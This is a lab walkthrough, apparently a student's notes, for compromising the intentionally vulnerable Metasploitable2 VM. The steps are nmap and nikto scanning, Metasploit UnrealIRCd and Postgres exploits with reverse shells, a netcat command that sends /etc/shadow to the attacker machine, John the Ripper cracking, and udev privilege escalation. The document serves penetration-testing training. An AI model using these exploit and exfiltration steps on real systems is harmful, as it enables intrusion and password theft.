Attempt to get a shell onto a remote system (Metasploitable2) and extract its password and shadow files for password cracking. Using SSH to verify results.
Set up a local nat network
File > Preferences > Network > add Nat Network
Settings > Network > Attach to > Nat Network
update: $apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
Settings > Network > Attach to > Nat Network
username: msfadmin
password: msfadmin
Finding your own IP
$ifconfig
Discovering other IPs on your network
$nmap -sP 10.0.2.0/24
After finding target on network, run nmap for ports and services discover
$nmap <Target IP>
Notice that there is an HTTP server running, use nikto to find vulnerabilities. Default port is 80
nikto -h <Target IP>
nikto returns a list of vulnerabilities for the server. Google these vulnerabilities and their potention exploits
Running Metasploit frameworks. Either use the fast access side bar in Kali or Applications > 08 - Exploitation > Metasploit Frameworks.
The first time starting metasploit will take a little bit as it needs to initialize a database.
Notice that there is an IRC service running on port 6667 during our nmap port scan.
https://www.cvedetails.com/cve/cve-2010-2075
https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor
There is a backdoor exploit we can use. To search for a unix irc exploit.
search type:exploit platform:unix irc
returns exploit/unix/irc/unreal_ircd_3281_backdoor
To use the exploit:
use exploit/unix/irc/unreal_ircd_3281_backdoor
Set the target host:
set RHOST <Target IP>
Show available payloads
show payloads
There is a reverse tcp payload. We can learn more about it with
info cmd/unix/reverse
To use the payload
set payload cmd/unix/reverse
We need to set some options such as LHOST
show options
set LHOST <Local IP>
Run the exploit
exploit
We now have a shell on the remote system. We can check that we're root with whoami. We can also check our IP with ifconfig. What we really want are the password hashes in the shadow file located in /etc/shadow.
cd /etc/
We will just netcat to transfer the file to our local machine from the stolen shell.
On local machine
nc -lp 1234 > shadow
On shell
cat shadow | nc <Local IP> 1234
We can now crack those passwords with john the ripper. Simply copy the shadow file into a hash.txt
cp shadow hash.txt
Run john
john hash.txt
We can also run john with its many built in wordlists.
john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Once the process is done, we can check our cracked passwords
john -show hast.txt
We should now have credentials for users on the remote machine. We can verify our passwords are correct using SSH
ssh username@<TargetIP>
Extra: Meterpreter - For Stealth, Flexibility, and Reliablity. help command
Postgress exploit
https://www.cvedetails.com/cve/cve-2007-3280
https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload
use exploit/linux/postgres/postgres_payload
show options
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <Local IP>
set RHOST <Target IP>
set PASSWORD postgres
exploit
We have a meterpreter as the postgres user. But we can elevate our priviledge to root
https://www.cvedetails.com/cve/cve-2009-1185
https://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink
meterpreter> background Note the session ID
use exploit/linux/local/udev_netlink
show options
set SESSION <ID of meterpreter>
exploit
We now have root privildege with Meterpreter.
https://metasploit.help.rapid7.com/docs/metasploitable-2
https://metasploit.help.rapid7.com/v1/docs/exploitation
https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide
https://docs.kali.org/general-use/starting-metasploit-framework-in-kali
https://tools.kali.org/information-gathering/nmap